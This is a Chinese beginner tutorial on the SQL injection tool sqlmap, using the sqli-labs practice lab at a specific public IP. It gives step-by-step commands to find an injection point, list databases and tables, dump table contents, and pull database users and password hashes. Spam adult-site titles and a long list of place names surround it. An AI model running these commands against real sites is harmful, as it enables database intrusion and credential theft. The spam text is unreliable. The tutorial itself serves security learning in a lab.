久久r热视频,国产午夜精品一区二区三区视频,亚洲精品自拍偷拍,欧美日韩精品二区

您的位置:首頁(yè)技術(shù)文章
文章詳情頁(yè)

SQL注入之sqlmap入門(mén)學(xué)習(xí)

瀏覽:3日期:2023-05-02 10:03:12
目錄
  • 一、判斷是否存在注入點(diǎn)
  • 二、查詢當(dāng)前用戶下所有數(shù)據(jù)庫(kù)
  • 三、獲取數(shù)據(jù)庫(kù)中的表名
  • 四、獲取表中的字段名
  • 五、獲取字段內(nèi)容
  • 六、獲取數(shù)據(jù)庫(kù)的所有用戶
  • 七、獲取數(shù)據(jù)庫(kù)用戶的密碼
  • 八、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫(kù)的名稱
  • 九、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫(kù)的用戶名稱

原來(lái)sql注入如此簡(jiǎn)單

以SQL注入靶場(chǎng)sqli-labs第一關(guān)為例,進(jìn)行sqlmap工具的使用分享。

一、判斷是否存在注入點(diǎn)

使用命令:

使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"

有圖中白色背景的 則判斷出有注入點(diǎn)

二、查詢當(dāng)前用戶下所有數(shù)據(jù)庫(kù)

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs

可以看到有五個(gè)表

三、獲取數(shù)據(jù)庫(kù)中的表名

選取一個(gè)challenges數(shù)據(jù)庫(kù),獲取此庫(kù)的表名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables  

四、獲取表中的字段名

選取表T5M0QG6FM2,獲取其中字段名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

五、獲取字段內(nèi)容

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

六、獲取數(shù)據(jù)庫(kù)的所有用戶

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users

使用該命令就可以列出所有管理用戶

七、獲取數(shù)據(jù)庫(kù)用戶的密碼

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords

八、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫(kù)的名稱

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

可以看到當(dāng)前的數(shù)據(jù)庫(kù)是 security

九、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫(kù)的用戶名稱

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user

當(dāng)前用戶是root

到此這篇關(guān)于SQL注入之sqlmap入門(mén)學(xué)習(xí)的文章就介紹到這了,更多相關(guān)sqlmap入門(mén)內(nèi)容請(qǐng)搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

標(biāo)簽: MsSQL
主站蜘蛛池模板: 涟源市| 华蓥市| 金川县| 阿克陶县| 九龙城区| 岳普湖县| 鹤山市| 北海市| 固阳县| 涿州市| 通渭县| 龙山县| 定南县| 保德县| 南宁市| 墨脱县| 长垣县| 民县| 商南县| 密山市| 泰宁县| 衡水市| 龙山县| 宾川县| 云南省| 宁乡县| 洞头县| 聂荣县| 湟源县| 麟游县| 丰台区| 农安县| 江津市| 阆中市| 沛县| 潜江市| 玉龙| 安庆市| 梁山县| 边坝县| 宿州市|